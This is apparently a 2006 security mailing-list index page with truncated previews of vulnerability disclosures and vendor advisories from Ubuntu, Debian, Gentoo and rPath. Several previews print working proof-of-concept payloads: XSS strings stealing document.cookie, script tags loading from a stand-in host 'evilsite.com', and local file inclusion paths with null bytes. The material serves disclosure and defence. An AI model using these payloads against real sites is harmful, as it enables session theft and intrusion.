http://target/index.php?STYLE_URL=%2527

http://index.php?STYLE_URL=<script>;alert(soot);</script>

[ more ]  [ reply ]

===========================================================
Ubuntu Security Notice USN-289-1 June 08, 2006
tiff vulnerabilities
CVE-2006-2193, CVE-2006-2656
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04

[ more ]  [ reply ]

Guy's the marquee tag dos exploit also afest's ie and opera also here is proof of concept credit's n00b and all that helped.

This is for opera and ie.

<html>

<head>

<style>

</style>

<title>Ie voulnrability credit's to n00b and every-one who helped.</title></head>

<body onload="javascript:

[ more ]  [ reply ]

Hi,

TinyWebGallery 1.4.2 is not vulnerable to cross-site scripting anymore.

All input parameters are now checked properly.

Solution: Update to TWG 1.4.

/Michael

[ more ]  [ reply ]

Vulnerable Systems:

All shoutcast servers!!

I found an error in shoutcast server.

Then I'm connecting to the server I type in the DJ columns( you can type in all columns) for exmple script pvz.:

<script>alert("boo");</script>

<script>location.href="google.com";</script>

or else...

So then

[ more ]  [ reply ]

This has been fixed according to the website:

http://www.eschew.net/forums/viewtopic.php?t=501

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1091-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
June 8th, 2006

[ more ]  [ reply ]

# PHP-Nuke <= 7.9 Search module XSS Vulnerability

# It could work on later versions if PHP-Nuke does not patch it.

1: Enter: http://[host]/modules.php?name=Search

2: Search for: "><body onload="alert(document.cookie)

// You'll get a javascript alert with your cookie in it.

# Credits: O.G.

[ more ]  [ reply ]

/ Federico Fazzi, <federico (at) autistici (dot) org [email concealed]>
*/ Back-end = 0.7.2.1 (jpcache.php) Remote command execution
*/ 08/06/2006 1:04

Bug:

jpcache.php: line 40

---
$includedir = $_PSL['classdir'] . "/jpcache";
---

Proof of concept:

Back-end have a default path pre-set on jpcache.php,
and cracker can execu

[ more ]  [ reply ]

// Script

Web -------- www.npds.org

versions --- NPDS <= 5.10

Solutions -- None official

Note ------- Vendor has been contacted

// Local Inclusion

http://[...]/header.php?Default_Theme=../apache/logs/error.log%00

http://[...]/modules/cluster-paradise/cluster-E.php?ModPath=../../../../
../apa

[ more ]  [ reply ]

Description of Vulnerability

============================

One of the features of Mathcad (www.mathsoft.com) is allowing the user to define ?Areas?. Mathsoft say that ?You can use areas to protect, lock, or hide information or equations in your worksheets? and that ?You can also protect the content

[ more ]  [ reply ]

Uninformed is pleased to announce the release of its fourth volume. The
articles included in this volume are:

- Engineering in Reverse: Improving Automated Analysis of Windows x64 Binaries
Author: skape

- Exploitation Technology: Exploiting the Otherwise Non-exploitable on Windows
Authors: Sk

[ more ]  [ reply ]

/*

*

* Internet Explorer Crash [Proof of concept]

* Bug discovered by MarjinZ & Mr.Niega

* http://www.swerat.com/

*

* Affected Software: Internet explorer

* Severity: Unknown

* Impact: Crash

* Solution Status: Unpatched

*

* E-Mail: Mr.Niega (at) gmail (dot) com [email concealed] & MarjinZ (at) gmail (dot) com [email concealed]

* __ __ _

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1092-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
June 8th, 2006

[ more ]  [ reply ]

This release fixes a recently declared XSS vulnerability. Anyone using tikiwiki 1.9.x should upgrade asap.

http://tikiwiki.org/tiki-read_article.php?articleId=131

[ more ]  [ reply ]

-----------------------------------------------------
Advisory id: FSA:006

Author: Federico Fazzi
Date: 08/06/2006, 11:09
Sinthesis: cms-bandits 2.5, Remote command execution
Type: high
Product: http://sourceforge.net/projects/cms-bandits
Patch: unavailable
----------------------

[ more ]  [ reply ]

rPath Security Advisory: 2006-0098-1
Published: 2006-06-08
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
Local System User Deterministic Privilege Escalation
Updated Versions:
gdm=/conary.rpath.com@rpl:devel//1/2.8.0.8-0.1-1

References:
http://www.cve.mitre.org/c

[ more ]  [ reply ]

Another hole found while mass auditing free cgi scripts. After finding
it and writing code for it I noticed there is already a a BID
(http://www.securityfocus.com/archive/1/425970), but no code. So, here
is some code. Maybe this will further provoke the author to get it
fixed.

--K-sPecial
## Creato

[ more ]  [ reply ]

Ez Ringtone Manager

Homepage:

http://www.scriptsez.net

Effected files:

player.php

search input box.

XSS Vulnerabilities:

http://example.com/ringtones/player.php?action=preview&id=<SCRIPT%20SRC=
http://evilsite.com/xss.js></SCRIPT>&cat=LG%20Mobiles

The search box doesnt properlly fil

[ more ]  [ reply ]

E-Dating System

Homepage:

http://www.scriptsez.net/

Effected files:

Input boxes.

cindex.php

Description:

A Professional dating system that uses flatfiles instead of MySQL.

XSS Vulnerabilities PoC:

The input boxes of sending a message, and editing your profile do not properally

[ more ]  [ reply ]

*/ Federico Fazzi, <federico (at) autistici (dot) org [email concealed]>
*/ MiraksGalerie <= 2.62 Multiple Remote command execution
*/ 07/06/2006 4:58

Bug:

pcltar.lib.php: line 34 - 35

---
if (!isset($g_pcltar_lib_dir))
$g_pcltar_lib_dir = "lib";
[etc..]
---

galimage.lib.php: line: 157 - 158

---
for($i=count($listconfi

[ more ]  [ reply ]

[MajorSecurity #10]i.List <= 1.5 - XSS

----------------------------------------

Software: i.List

Version: <=1.5

Type: XSS

Date: June, 8th 2006

Vendor: Skoom

Page: http://skoom.de

Credits:

-------------------------------

David 'Aesthetico' Vieira-Kurz

http://www.majors

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1093-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
June 8th, 2006

[ more ]  [ reply ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]

ViArt Shop v2.5.5 Free (and possibly Light, Standard, and Enterprise)

Authors Site: http://www.codetosell.com/

+-[Examples:]--------------------------------------------------+

XSS:

/forum.php?forum_id="><script>alert('XSS');</script>&category_id=1

/reviews.php?category_id=0&item_id=4&rnd=114961

[ more ]  [ reply ]

Easy Ad-Manager v. (unknown, not listed on homepage)

Homepage:

http://www.scriptsez.net

Effected files:

details.php

XSS Vulnerability with full path disclosure:

http://www.example.com/eam/details.php?do=load&mbid=/<SCRIPT%20SRC=http:
//evilsite.com/xss.js></SCRIPT>

Warning: fopen(sta

[ more ]  [ reply ]